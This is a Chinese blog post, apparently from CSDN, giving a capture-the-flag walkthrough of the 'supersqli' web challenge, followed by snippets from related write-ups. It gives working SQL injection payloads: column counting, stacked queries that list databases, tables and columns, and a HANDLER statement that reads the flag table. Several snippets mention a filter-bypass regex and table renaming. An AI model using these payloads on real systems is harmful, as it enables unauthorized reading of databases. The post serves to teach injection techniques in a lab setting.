攻防世界---web---supersqli

最新推荐文章于 2024-09-07 19:33:29 发布
最新推荐文章于 2024-09-07 19:33:29 发布
阅读量589 收藏 4
点赞数 13
文章标签: 数据库 ctf web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/139030204
版权

1、题目描述

2、判断注入点,这里输入1'报错了,说明存在注入点

3、查看列数,根据结果显示可知,有2列

1' order by 1#

 

1' order by 3# 

 

4、查看数据库名,这里发现select被过滤了

1' union select 1,databases();# 

 

5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。

 1';show databases;#

 

6、查询"supersqli"数据库中的表名,使用下面的方法,查到了两张表。

 1';use supersqli;show tables;#

 

7、查询字段,由于表名是字符串,所以需要用``反引号。

 1';use supersqli;show columns from `1919810931114514`;#

 

8、看到了flag字段,接着查询flag字段里面的信息。打开名为 1919810931114514 的表,并将其命名为 p读取p表的第一行数据

1';use supersqli;handler `1919810931114514` open as p;handler p read first;#

 

 

攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 826
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
攻防世界】——WEB高手进阶--supersqli
weixin_43828818的博客
05-23 583
题目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。 order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。 尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以 1‘;show talbes–+ 查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。 1’;show c
supersqli_攻防世界
u014794949
10-23 432
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界——supersqli
weixin_62281892的博客
09-18 1877
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界 supersqli
最新发布
beiweixiaotian66的博客
09-07 1251
一般sql语句的题都是先判断,经过测试,是单引号注入可以发现很多关键字都被过滤了select,所以联合查询,报错注入,布尔和时间盲注都不能用了,可以想到堆叠注入。纯数字的表需要加上引号然后我们要知道如何拿到这个列中的flag的数据我记得之前我是做过的,还是卡在了这里QAQ。
攻防世界-web-supersqli
wuh2333的博客
06-07 982
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界supersqli
金 帛的博客
03-08 8123
攻防世界WP
攻防世界web--supersqli
m0_60715541的博客
10-27 335
一道攻防世界上面的sql注入
攻防世界-supersqli详解
Mr_helloword的博客
08-11 6899
supersqli 查看是否存在SQL注入 1' and 1=1 # 用二分法查看列数(有两列) 1' order by 2 # 使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
攻防世界-web高手进阶区
zji
04-25 6652
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界靶场(web-supersqli)--堆叠注入、二次注入
DMXA的博客
09-21 480
这段代码是使用 PHP 语言编写的一个正则表达式,用于检测变量 $inject 中是否包含一些常见的 SQL 注入攻击关键字。具体来说,它通过 preg_match() 函数匹配字符串 $inject 中是否存在以下关键字(不区分大小写):select: 查询关键字。update: 更新关键字。delete: 删除关键字。drop: 删除表关键字。insert: 插入关键字。where: 查询条件关键字。.: 正则表达式中的特殊字符,可能被用于注入攻击。
攻防世界supersqli(堆叠注入)
2302_79800344的博客
04-09 1061
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1833
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
攻防世界-supersqli
m0_63563528的博客
03-28 558
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
[攻防世界]supersqli
weixin_55466841的博客
04-30 268
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
supersqli-攻防世界
szhangliwenya的博客
03-30 2267
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界supersqli
zara_anna的博客
07-27 235
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。
攻防世界supersqli
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,开发人员可以采取以下措施: 1. 输入验证和过滤:对于所有用户输入的数据,进行严格的验证和过滤,确保只接受预期的数据类型和格式。 2. 使用参数化查询:使用参数化查询或预编译语句,而不是直接拼接用户输入的数据到SQL语句中。这样可以防止SQL注入攻击成功。 3. 最小权限原则:数据库用户应该具有最低权限来执行操作,以限制攻击者在成功注入后能够执行的操作范围。 4. 错误消息处理:不要向用户显示详细的错误消息,因为攻击者可能会利用这些错误消息来获取有关数据库结构和查询的信息。 5. 定期更新和漏洞扫描:及时更新应用程序和数据库,以确保已修复已知的漏洞,并对应用程序进行定期的漏洞扫描。 这些是一些常见的防御措施,但是请注意,没有绝对安全的系统,因此需要综合考虑多个安全层面来保护应用程序和数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值